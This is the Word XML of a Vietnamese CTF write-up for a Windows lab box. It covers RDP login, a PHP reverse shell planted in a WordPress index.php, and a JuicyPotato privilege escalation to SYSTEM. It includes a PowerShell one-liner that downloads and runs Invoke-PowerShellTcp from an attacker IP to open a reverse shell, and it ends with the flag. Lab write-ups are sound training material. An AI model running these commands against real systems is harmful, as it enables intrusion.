    </w:p>
    <w:p w14:paraId="7F4EC09B" w14:textId="64EC1EE0" w:rsidR="00C20582" w:rsidRDefault="00D062D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nhớ ứng dụng có chạy dịch vụ RDP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51696465" w14:textId="533D5B8B" w:rsidR="00D062DD" w:rsidRDefault="00D062DD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73EDD010" w14:textId="016068A7" w:rsidR="00D062DD" w:rsidRPr="00D062DD" w:rsidRDefault="00D062DD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D062DD">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xfreerdp /u:wade /p:parzival /cert:ignore /v:10.10.187.172</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9B76FA" w14:textId="77777777" w:rsidR="00D062DD" w:rsidRDefault="00D062DD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="227DB52E" w14:textId="6C571811" w:rsidR="009B036E" w:rsidRDefault="00737EA8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00737EA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Kết nối thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7598035A" w14:textId="63C59984" w:rsidR="00FD70BE" w:rsidRDefault="00FD70BE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E9F46AE" w14:textId="5B4D82ED" w:rsidR="00FD70BE" w:rsidRDefault="00BC2B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563F028" wp14:editId="3C6073F6">
            <wp:extent cx="5943600" cy="21450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A0C7" w14:textId="11B8D49A" w:rsidR="00BC2BCB" w:rsidRDefault="00BC2BCB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC0D768" w14:textId="0B44B9BD" w:rsidR="00BC2BCB" w:rsidRDefault="00992E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kết nối đến meterpreter shell để khai thác cho dễ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66963F2E" w14:textId="2D02B868" w:rsidR="00992E25" w:rsidRDefault="00992E25">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C692873" w14:textId="0DE0518A" w:rsidR="00992E25" w:rsidRDefault="00992E2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514E20" wp14:editId="38B41E70">
            <wp:extent cx="5270500" cy="2070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D4C0" w14:textId="1806BC51" w:rsidR="00992E25" w:rsidRDefault="00992E25">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="557339D4" w14:textId="77777777" w:rsidR="00992E25" w:rsidRDefault="00992E25">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF56F8B" w14:textId="487292A6" w:rsidR="00992E25" w:rsidRDefault="00992E25">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E70C258" w14:textId="41A47513" w:rsidR="00992E25" w:rsidRDefault="00992E2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3B7BCD" wp14:editId="72DE6A65">
            <wp:extent cx="5270500" cy="218815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198" cy="219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2727" w14:textId="01E6E76D" w:rsidR="00AE4A4D" w:rsidRDefault="00AE4A4D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED37D2E" w14:textId="43AB162B" w:rsidR="00AE4A4D" w:rsidRPr="004E2BA6" w:rsidRDefault="00AE4A4D" w:rsidP="004E2BA6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4E2BA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Chạy thử các khai thác trên </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8C9E0B" w14:textId="2DF11C00" w:rsidR="004D1AFF" w:rsidRPr="004E2BA6" w:rsidRDefault="004E2BA6" w:rsidP="004E2BA6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4E2BA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00AE4A4D" w:rsidRPr="004E2BA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ìm kiếm CVE dựa t</w:t>
      </w:r>
      <w:r w:rsidRPr="004E2BA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rên</w:t>
      </w:r>
      <w:r w:rsidR="00AE4A4D" w:rsidRPr="004E2BA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Server 2016</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342D4436" w14:textId="0DBD33F9" w:rsidR="004E2BA6" w:rsidRDefault="004E2BA6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E2BA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Không leo thang đặc quyền được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7F8EC1" w14:textId="6E945DE6" w:rsidR="004E2BA6" w:rsidRDefault="004E2BA6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CE32DF3" w14:textId="56092E1D" w:rsidR="004E2BA6" w:rsidRDefault="004E2B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quay lại wordpress để khai thác. Lần này mình chỉnh sửa trang index.php bằng reverse shell của Ivan Sincek:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393AE24E" w14:textId="2308A706" w:rsidR="004E2BA6" w:rsidRDefault="004E2BA6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DFC5F1C" w14:textId="4D1320FD" w:rsidR="004E2BA6" w:rsidRDefault="004E2BA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706A9D" wp14:editId="10EAA09D">
            <wp:extent cx="5289550" cy="299767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2" t="15269" r="8468" b="4031"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5289820" cy="299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55D74" w14:textId="073F194A" w:rsidR="004871C1" w:rsidRDefault="004871C1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AB9DFF6" w14:textId="59F64B9D" w:rsidR="004871C1" w:rsidRDefault="003100E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05173E7" wp14:editId="5F3045E5">
            <wp:extent cx="4642338" cy="4667634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695" cy="467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FB5AD" w14:textId="4DA9A06A" w:rsidR="003100E6" w:rsidRDefault="003100E6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F7BD1EE" w14:textId="7D9D080B" w:rsidR="003100E6" w:rsidRDefault="003100E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Người dùng là iisappool có đặc quyền SeImpersonate.</w:t>
      </w:r>
      <w:r w:rsidR="003714DF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chúng ta có thể lợi dụng điều này để leo thang lên SYSTEM vì vậy thử khai thác bằng JuicyPotato.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4A874F" w14:textId="2235982D" w:rsidR="003714DF" w:rsidRDefault="003714DF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1BABD8" w14:textId="296E2E69" w:rsidR="003714DF" w:rsidRDefault="005C725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Để khai thác được JuicyPotato, mình cần vận chuyển:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3376DEED" w14:textId="1D2E2086" w:rsidR="005C725A" w:rsidRPr="000F32A9" w:rsidRDefault="005C725A" w:rsidP="000F32A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0F32A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JuicyPotato.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA283E2" w14:textId="3CA0A550" w:rsidR="005C725A" w:rsidRPr="000F32A9" w:rsidRDefault="00FB074A" w:rsidP="000F32A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0F32A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GetCLSID.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BA6220" w14:textId="1B637CA5" w:rsidR="00C67558" w:rsidRPr="000F32A9" w:rsidRDefault="000F32A9" w:rsidP="000F32A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F32A9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tập tin bash thực thi reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63112D7C" w14:textId="571E1634" w:rsidR="00C67558" w:rsidRDefault="00C67558">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73ADEDBE" w14:textId="0DE01E6B" w:rsidR="00CF6855" w:rsidRDefault="00FB074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GetCLSID.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FB9FCD" w14:textId="77777777" w:rsidR="00FB074A" w:rsidRDefault="00FB074A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="304E2543" w14:textId="752E5D67" w:rsidR="00CF6855" w:rsidRDefault="00FB074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4FCF887" wp14:editId="12D75525">
            <wp:extent cx="5943600" cy="28098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21C5" w14:textId="48964507" w:rsidR="00FB074A" w:rsidRDefault="00FB074A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47E2FBCD" w14:textId="33F31009" w:rsidR="00FB074A" w:rsidRDefault="00FB074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Máy chủ là Windows Server 2016 Standard nên mình dùng CLSID của BITS: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB074A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4991d34b-80a1-4291-83b6-3328366b9097</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBAEB49" w14:textId="33E103F8" w:rsidR="000F32A9" w:rsidRDefault="000F32A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A6220A0" w14:textId="53BF3E78" w:rsidR="000F32A9" w:rsidRDefault="000F32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Tập tin bash thực thi reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACC6685" w14:textId="3E85EFDB" w:rsidR="000F32A9" w:rsidRDefault="000F32A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="334F81FF" w14:textId="6B9918F5" w:rsidR="000F32A9" w:rsidRPr="00EF5C54" w:rsidRDefault="000F32A9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF5C54">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell </w:t>
      </w:r>
      <w:r w:rsidR="006F0D2E" w:rsidRPr="00EF5C54">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF5C54">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iex (New-Object Net.WebClient).DownloadString('http://10.8.55.148:9000/Invoke-PowerShellTcp.ps1')</w:t>
      </w:r>
      <w:r w:rsidR="006F0D2E" w:rsidRPr="00EF5C54">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF5C54">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>;Invoke-PowerShellTcp -Reverse -IPAddress 10.8.55.148 -Port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2504BF25" w14:textId="20FD837C" w:rsidR="000F32A9" w:rsidRDefault="000F32A9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B7646E0" w14:textId="6B5F52BB" w:rsidR="000F32A9" w:rsidRDefault="0018098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E19ECCD" wp14:editId="1CD9BEA1">
            <wp:extent cx="4560277" cy="24521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8040" cy="24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0C59" w14:textId="77777777" w:rsidR="006F0D2E" w:rsidRDefault="006F0D2E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C2548E7" w14:textId="51AAEBC6" w:rsidR="00180987" w:rsidRDefault="008F188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23F0FC" wp14:editId="7E90AC7F">
            <wp:extent cx="5943600" cy="1485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F45B" w14:textId="77777777" w:rsidR="00EF5C54" w:rsidRDefault="00EF5C54">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757D5602" w14:textId="18C4AE8B" w:rsidR="004E2BA6" w:rsidRDefault="00EF5C5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54CEEA" wp14:editId="5E0FD261">
            <wp:extent cx="5943600" cy="17608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33AD" w14:textId="440C65BD" w:rsidR="00AE4A4D" w:rsidRDefault="00AE4A4D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA7E119" w14:textId="4C68CE4E" w:rsidR="00AE4A4D" w:rsidRDefault="0031236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787860" wp14:editId="1A8E76EC">
            <wp:extent cx="5359400" cy="4699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F6EEF" w14:textId="2A0FB68B" w:rsidR="00312368" w:rsidRDefault="00312368">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37DAC5BE" w14:textId="79955F76" w:rsidR="00312368" w:rsidRPr="00312368" w:rsidRDefault="00312368">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00312368">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flag: 7958b569565d7bd88d10c6f22d1c4063</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727C2EEB" w14:textId="2120F3B8" w:rsidR="00312368" w:rsidRDefault="00312368">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0832A78C" w14:textId="77777777" w:rsidR="00312368" w:rsidRPr="00953EA7" w:rsidRDefault="00312368">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00312368" w:rsidRPr="00953EA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1A644AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="592685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CB4EAC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1DE4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B07CC7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59E2A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3C3A"/>
    <w:rsid w:val="000F32A9"/>
    <w:rsid w:val="00173A0C"/>
    <w:rsid w:val="00180987"/>
    <w:rsid w:val="0019438A"/>
    <w:rsid w:val="001A1531"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="003100E6"/>
    <w:rsid w:val="00312368"/>
    <w:rsid w:val="00323C3A"/>
    <w:rsid w:val="00332D01"/>
    <w:rsid w:val="003714DF"/>
    <w:rsid w:val="00414350"/>
    <w:rsid w:val="00471E26"/>
    <w:rsid w:val="00481106"/>
    <w:rsid w:val="004871C1"/>
    <w:rsid w:val="004D1AFF"/>
    <w:rsid w:val="004E2BA6"/>
    <w:rsid w:val="00551092"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005C725A"/>
    <w:rsid w:val="00610790"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="006C0C4C"/>
    <w:rsid w:val="006F0D2E"/>
    <w:rsid w:val="00737EA8"/>
    <w:rsid w:val="0074193C"/>
    <w:rsid w:val="007451ED"/>
    <w:rsid w:val="00787D65"/>
    <w:rsid w:val="00821AF8"/>
    <w:rsid w:val="008C1ADB"/>
    <w:rsid w:val="008F188B"/>
    <w:rsid w:val="00935934"/>
    <w:rsid w:val="00953EA7"/>
    <w:rsid w:val="00992E25"/>
    <w:rsid w:val="009B036E"/>
    <w:rsid w:val="009F0BE3"/>
    <w:rsid w:val="00AD3038"/>
    <w:rsid w:val="00AE4A4D"/>
    <w:rsid w:val="00BC2BCB"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C20582"/>
    <w:rsid w:val="00C67558"/>
    <w:rsid w:val="00CF6855"/>
    <w:rsid w:val="00D062DD"/>
    <w:rsid w:val="00D424CA"/>
    <w:rsid w:val="00E43031"/>
    <w:rsid w:val="00E86720"/>
    <w:rsid w:val="00EE4D33"/>
    <w:rsid w:val="00EF5C54"/>
    <w:rsid w:val="00FB074A"/>
    <w:rsid w:val="00FD70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C6CB6C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{665D70FB-D39A-C148-A3AC-2425FAE1D9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C205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403</Words>
  <Characters>2299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35</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-21T15:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-23T15:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>